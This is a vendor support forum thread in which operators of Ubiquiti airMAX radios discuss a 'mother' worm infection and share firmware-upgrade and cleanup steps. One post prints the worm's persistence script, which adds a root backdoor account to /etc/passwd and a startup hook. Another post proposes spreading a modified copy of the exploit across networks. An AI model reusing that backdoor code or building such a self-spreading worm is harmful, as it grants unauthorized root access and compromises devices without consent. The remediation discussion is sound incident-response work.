Reply
Ubiquiti Employee
Posts: 11,848
Registered: ‎11-27-2012
Kudos: 3796
Solutions: 778
Contributions: 73

Re: Virus attack - URGENT @UBNT


@ivanbon wrote:

Only some got 5.6.4.. the most ones got 5.5.10 cause our reseller still ship us with that firmware

and yes.. we got 2-3 standard installation password then pretty sure they got same pass

 

 


I would upgrade any existing units to 5.6.4, verify no custom scripts are running and change the password. 5.5.10 would be exploitable.

UBNT_Alternate_Logo.png
Ubiquiti Networks airMAX Support Team

Check out our ever-evolving Help Center for answers to many common questions!

FREE UBWA Student Guide-Great RF Primer!

Member
Posts: 275
Registered: ‎03-14-2008
Kudos: 8

Re: Virus attack - URGENT @UBNT

Is 5.6.4 SAFE. 

 

New Member
Posts: 8
Registered: ‎11-12-2011

Re: Virus attack - URGENT @UBNT

How to verify that ther is no custom scripts running on device?

New Member
Posts: 13
Registered: ‎11-26-2012

Re: Virus attack - URGENT @UBNT

Hi all, we have a lot of CPE hacked Man Sad I check the script in /etc/persistent/

I found a "i" script 

XM.v5.6.4# cat i
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd
grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd /etc/persistent ; tar -xf mf.tar ; $per/.mf/mother" >> $per/rc.poststart
chmod +x $per/rc.poststart
rm $per/mother
rm $per/download
rm $per/f*u*c*k*e*r* (sorry but the forum don't allow to post this word)
rm $per/search
rm $per/curl
rm $per/lib*
cfgmtd -w -p /etc/

reboot -n -f >/dev/null &

the Virus create a new user in /etc/password called mother

 

the best way to delete all is

cd /etc/persistent
rm -R mcuser
rm -R .mf
rm *
sed -n '/mother/!p' /etc/passwd > /etc/passwd.new
mv /etc/passwd.new /etc/passwd
cfgmtd -w -p /etc/
killall -9 search
killall -9 mother
killall -9 sleep
reboot

 

 

New Member
Posts: 1
Registered: ‎05-14-2016

Re: Virus attack - URGENT @UBNT

many of our CPEs has been infected as well, a smart way to counter it is to use the same exploit and modify the virus scripts to clear itself while it spreads in the netwrok, any one has some time to make a stop to it !

 

 

 

Emerging Member
Posts: 86
Registered: ‎10-28-2010
Kudos: 44

Re: Virus attack - URGENT @UBNT

5.6.4 is being compromised as well.  We are seeing it on our network.  It makes it impossible to login to the radio if it is still online.  However many of the radios have gone offline.  Radios that have had the ports changed appear not to be compromised.  I was able to download a custom script that had been installed and it looks like it is a SSH key.

Highlighted
Member
Posts: 275
Registered: ‎03-14-2008
Kudos: 8

Re: Virus attack - URGENT @UBNT

Is UBNT doing anything for christ sakes

 

Regular Member
Posts: 563
Registered: ‎12-20-2010
Kudos: 78
Solutions: 1

Re: Virus attack - URGENT @UBNT

We just deleted the virus of one cpe, upgraded it and before it got upgraded the virus was back.

After the upgrade. virus is still there.

Established Member
Posts: 1,420
Registered: ‎05-18-2011
Kudos: 516
Solutions: 110
Contributions: 2

Re: Virus attack - URGENT @UBNT

[ Edited ]

There's no improvement if you kill the running processes of the exploit. The real thing is stop the exploit outbound traffic, remove the exploit and run cfgmtd & reboot.

Ubiquiti Employee
Posts: 11,848
Registered: ‎11-27-2012
Kudos: 3796
Solutions: 778
Contributions: 73

Re: Virus attack - URGENT @UBNT


@wolfcreek wrote:

5.6.4 is being compromised as well.  We are seeing it on our network.  It makes it impossible to login to the radio if it is still online.  However many of the radios have gone offline.  Radios that have had the ports changed appear not to be compromised.  I was able to download a custom script that had been installed and it looks like it is a SSH key.


Could you send me any files/scripts you have recovered?  james@ubnt.com

 

This mf variant does, in fact, use the exploit that was addressed in 5.6.2.  Is it possible you have some radios on pre5.6.2 firmware?

UBNT_Alternate_Logo.png
Ubiquiti Networks airMAX Support Team

Check out our ever-evolving Help Center for answers to many common questions!

FREE UBWA Student Guide-Great RF Primer!

New Member
Posts: 25
Registered: ‎05-03-2016
Kudos: 7

Re: Virus attack - URGENT @UBNT

[ Edited ]

Who has equipment in versions 5.6.4 and 5.6.3 infected still can try these commands below:

 

grep -E "users|sshd.auth.key" /tmp/system.cfg; rm -fr /etc/persistent/rc.* /etc/persistent/profile; rm -rf /etc/persistent/rc.poststart; rm -rf mf.tar; cfgmtd -w -p /etc; reboot -f;

 

Access via ssh, see if "rc.poststart" still exists, if there is repeat the command, log in via ssh as soon as possible and repeat the procedure. Here's the desired effect.

New Member
Posts: 13
Registered: ‎11-26-2012

Re: Virus attack - URGENT @UBNT

Hi James, I've just sent you an email

New Member
Posts: 1
Registered: ‎04-28-2014

Re: Virus attack - URGENT @UBNT

ola, sou do RS, tem como entrar em contato pelo Whats (51) 9990.2277

New Member
Posts: 7
Registered: ‎04-12-2014
Kudos: 7

Re: Virus attack - URGENT @UBNT

The MF-Script is working in steps with sleep timers.

Can someone please explain exactly what those steps mean for AP and STAs?

We read the source and saw one command "poweroff". What happens after unplugging and repluging?

It could even change the SSID to Mother F-er. Does it really do it?

 

Please give as much advice for all szenarios as possible, please.

Thanks a lot!

Regular Member
Posts: 563
Registered: ‎12-20-2010
Kudos: 78
Solutions: 1

Re: Virus attack - URGENT @UBNT

Hi again.

 

After upgrading and cleaning it works again.

I suggest UBNT writes an Bulk Email to all the news subscribers and to their distributors, that all MUST upgrade

if not they risk their entire network. just a small suggestion which keeps customers happy Man Happy

 

Member
Posts: 230
Registered: ‎07-06-2012
Kudos: 68
Solutions: 5

Re: Virus attack - URGENT @UBNT

Can you give me a step by step account of what you did to clean the antennas? We cant seem to make anything work.

Regular Member
Posts: 513
Registered: ‎03-12-2013
Kudos: 62
Solutions: 10

Re: Virus attack - URGENT @UBNT

[ Edited ]

can I turn ssh port 22 off so they can not enter via ssh

 

we run with 5.6.4 on all devices but can they do something about the version

 

and what is it exactly the virus dos beyond changing Password

 

/Flemming

Regular Member
Posts: 563
Registered: ‎12-20-2010
Kudos: 78
Solutions: 1

Re: Virus attack - URGENT @UBNT

Open putty. open the antenna.

 

Step1:

 

cd /etc/persistent

rm -R mcuser

rm -R .mf

rm *

sed -n '/mother/!p' /etc/passwd > /etc/passwd.new

mv /etc/passwd.new /etc/passwd

cfgmtd -w -p /etc/

killall -9 search

killall -9 mother

killall -9 sleep

reboot

 

Step 2:

XM firmware

 

cd /tmp/

wget http://dl.ubnt.com/firmwares/XN-fw/v5.6.4/XM.v5.6.4.28924.160331.1253.bin

mv XM.v5.6.4.28924.160331.1253.bin fwupdate.bin

ubntbox fwupdate.real -m /tmp/fwupdate.bin

 

XW firmware

 

cd /tmp/

wget http://dl.ubnt.com/firmwares/XW-fw/v5.6.4/XW.v5.6.4.28924.160331.1238.bin

mv XW.v5.6.4.28924.160331.1238.bin fwupdate.bin

ubntbox fwupdate.real -m /tmp/fwupdate.bin

 

If you don´t have internet at the device you have an issue.

You need then locally upload the firmware.

 

 

Deleted Account
Posts: 0

Re: Virus attack - URGENT @UBNT

can I turn ssh port 22 off so they can not enter via ssh

/Flemming

 

Know that AirControl2 will not work if you turn off SSH

It requires SSH port 22 

Established Member
Posts: 1,015
Registered: ‎10-24-2009
Kudos: 85
Solutions: 1

Re: Virus attack - URGENT @UBNT

Does aircontrol 2 have a way to process tasks like command line as described in the older skynet virus fix??  

That would make this a lot easier to fix all these radios.

Yep, that can happen
www.wirelessdatanet.net
Reply